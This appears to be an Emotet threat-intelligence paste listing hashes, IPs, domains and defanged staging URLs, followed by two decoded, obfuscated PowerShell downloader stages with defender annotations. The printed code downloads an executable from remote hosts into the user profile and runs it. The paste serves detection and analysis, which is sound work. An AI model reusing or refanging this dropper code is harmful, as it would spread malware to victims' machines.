paladin316

Emotet_Doc_out_2020-02-03_14_27.txt

Feb 3rd, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 2aed441feb0d38c4c21858e907fb45a10a75f33c53158c64c67e85bab1e621c5
  5. ac2327f210643de38481941d82d7dddcdf00af04546849e465856cb8451241ee
  6. 2829244f2b1520590571662a8bf2d0b3db7d44f4755a920f09fb0881f707a8b7
  7.  
  8.  
  9. IPs:
  10. 104.18.56.166
  11. 104.18.57.166
  12. 107.180.2.223
  13. 120.78.167.124
  14. 172.105.174.17
  15. 185.32.20.6
  16. 188.85.143.170
  17. 192.241.143.52
  18. 195.223.215.190
  19. 35.237.206.52
  20. 69.16.201.104
  21. 98.199.196.197
  22.  
  23. Domains:
  24. fdhk.net
  25. HTTP
  26. iihttanzania.com
  27. myphamthanhbinh.net
  28. sfmac.biz
  29. www.bluedream.al
  30. www.cometprint.net
  31. www.mjmechanical.com
  32.  
  33.  
  34. hxxp://iihttanzania.com/wp-admin/N8CWI/
  35. hxxp://fdhk.net/plugins/8xshhk/
  36. hxxp://pmvraetsel.newsoftdemo.info/wp-admin/pyUl573/
  37. hxxp://realizaweb.site/cgi-bin/AbeNM155769/
  38. hxxp://rochun.org/error/7WJ1/
  39. hxxp://www.bluedream.al/calendar/r83g9/
  40. hxxp://myphamthanhbinh.net/wp-content/uploads/qDq/
  41. hxxp://sfmac.biz/calendar/K1a/
  42. hxxps://www.cometprint.net/cgi-bin/q/
  43. hxxp://www.mjmechanical.com/wp-includes/ddy/
  44.  
  45.  
  46. Decoded Base64 PowerShell (URLs defanged as hxxp):
  # Analyst annotation (defender view). This is the second-stage downloader the
  # paste labels "Decoded Base64 Powershell"; presumably it is what the maldoc
  # macro hands to powershell.exe. The poster defanged every URL as "hxxp".
  # The randomly named string assignments that are never read again
  # ($Jonbehomiwt, $Vpryjauwezvg, $Imekoilmyvkms, ...) are filler; the lines that
  # matter build the drop path, create a WebClient, hold the URL list, and run
  # the download / size-check / start loop.
  47. $Jonbehomiwt='Rpsjfzzcee';
  48. $Jqiqrdywerejv = '933';
  49. $Vpryjauwezvg='Veztywnepzv';
  # Drop path is %USERPROFILE%\933.exe -- a hunting artefact (file creation by
  # powershell.exe directly under the user profile root).
  50. $Suidtvcknoih=$env:userprofile+'\'+$Jqiqrdywerejv+'.exe';
  51. $Imekoilmyvkms='Mqwdjkdyfka';
  # 'new'+'-ob'+'ject' is New-Object; NET.wEBCLIeNt resolves case-insensitively
  # to System.Net.WebClient. The concatenated cmdlet names here and the
  # backtick-escaped member names below ("dowNLO`A`dFI`LE" is DownloadFile,
  # "lENG`Th" is Length, "stA`RT" is Start) are string-level obfuscation,
  # presumably aimed at static keyword signatures; Script Block Logging
  # (Event ID 4104) records the de-obfuscated form at run time.
  52. $Biswqqqhwjdy=&('new'+'-ob'+'ject') NET.wEBCLIeNt;
  # Lines 53-58 are ONE statement: five URLs in a single multi-line
  # single-quoted string, then .Split() on the literal newline that spans
  # lines 57-58. Do not read the URL lines as separate statements.
  53. $Ivmqpivf='hxxp://iihttanzania.com/wp-admin/N8CWI/
  54. hxxp://fdhk.net/plugins/8xshhk/
  55. hxxp://pmvraetsel.newsoftdemo.info/wp-admin/pyUl573/
  56. hxxp://realizaweb.site/cgi-bin/AbeNM155769/
  57. hxxp://rochun.org/error/7WJ1/'."SPl`iT"('
  58. ');
  59. $Qasdgemka='Ykcxipgfl';
  # Failover loop: each URL is tried in order; catch{} swallows every error, so
  # a dead or cleaned host simply advances to the next. Network-side this is
  # powershell.exe making sequential outbound HTTP requests to the listed hosts.
  60. foreach($Rgvjtnup in $Ivmqpivf){try{$Biswqqqhwjdy."dowNLO`A`dFI`LE"($Rgvjtnup, $Suidtvcknoih);
  61. $Ycstleozzolf='Dhgozdmbpeyig';
  # Guard: the file is only started if it is at least 32019 bytes (presumably to
  # reject an error page or empty response served by a dead staging host);
  # [Diagnostics.Process]::Start then runs it and the loop breaks.
  # Detection point: process creation of <profile>\<digits>.exe with
  # powershell.exe as parent.
  62. If ((.('G'+'e'+'t-Item') $Suidtvcknoih)."lENG`Th" -ge 32019) {[Diagnostics.Process]::"stA`RT"($Suidtvcknoih);
  63. $Ulgybpkmt='Bprmfgyeharmv';
  64. break;
  # The "}}catch{}}" on the next line closes the first script; the text after it
  # (note the missing ';' before $Nahxbzxmnsmb) starts a second, structurally
  # identical script. The paste appears to be two decoded stages concatenated,
  # likely from two different documents (different drop name, threshold and
  # URL set).
  65. $Mnvcyyiuuaywx='Turhklxrschki'}}catch{}}$Zksdcwrr='Suxmgjbqkgwuo'$Nahxbzxmnsmb='Gbmdnmghn';
  66. $Qshhtlnimac = '906';
  67. $Jllxiysvhp='Sbpbdavfzfgh';
  # Second sample: drop path %USERPROFILE%\906.exe.
  68. $Jaepuporub=$env:userprofile+'\'+$Qshhtlnimac+'.exe';
  69. $Pznfmjcoqlbpk='Yxrusllwfd';
  # Same New-Object System.Net.WebClient, with a different concatenation split.
  70. $Vodljxrzqmnl=&('new'+'-'+'obj'+'ect') NEt.weBClIENT;
  # Second URL set, again one multi-line string split on the newline spanning
  # lines 75-76. One of the five uses hxxps (HTTPS), the rest plain HTTP.
  71. $Aiuwgxcngj='hxxp://www.bluedream.al/calendar/r83g9/
  72. hxxp://myphamthanhbinh.net/wp-content/uploads/qDq/
  73. hxxp://sfmac.biz/calendar/K1a/
  74. hxxps://www.cometprint.net/cgi-bin/q/
  75. hxxp://www.mjmechanical.com/wp-includes/ddy/'."S`PLIT"('
  76. ');
  77. $Pndfexli='Cdxreleao';
  # Same failover download loop with errors swallowed by catch{}.
  78. foreach($Peyoauygfcguz in $Aiuwgxcngj){try{$Vodljxrzqmnl."DO`WNLoaDF`ilE"($Peyoauygfcguz, $Jaepuporub);
  79. $Wbhpmhlec='Zhnbmgwr';
  # Same size guard, threshold 39143 bytes for this sample, then Start and break.
  80. If ((&('Ge'+'t-It'+'em') $Jaepuporub)."l`ENgtH" -ge 39143) {[Diagnostics.Process]::"sTA`RT"($Jaepuporub);
  81. $Pvnxagasepx='Lvprqzdqaaep';
  82. break;
  83. $Yydwqzgl='Pgfdjdlb'}}catch{}}$Prqfazcypvjh='Cubthwma'